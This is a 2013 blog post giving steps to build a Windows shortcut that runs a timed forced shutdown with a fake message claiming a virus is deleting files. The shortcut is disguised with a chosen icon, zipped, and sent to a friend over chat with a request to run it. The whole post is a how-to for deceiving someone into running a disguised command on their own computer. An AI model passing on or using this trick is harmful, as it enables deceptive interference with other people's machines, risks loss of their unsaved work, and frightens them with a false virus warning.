Tuesday, 11 June 2013

How to Shutdown your Friend(s) computer while chatting

It can be the coolest thing to do with you friends while chatting. There is no Limitation on the messenger e.g Facebook messenger,Yahoo messenger etc. The messenger should provide the file transfer service to send the following Program.

STEP 1) right-click on any folder goto -> New -> Shortcut.

STEP 2) Type in shortcut %windir%\system32\shutdown.exe -s -t 120 -c “The 31HA0w Virus Have invaded your Computer. And it is deleting your files”

STEP 3) right-click the shortcut goto -> Properties -> Choose Icon. Now choose any icon of your choice.

STEP 4) Compress the file in ZIP and send it to your friend while chatting and ask him to run it.

How to Shutdown your Friend(s) computer while chatting


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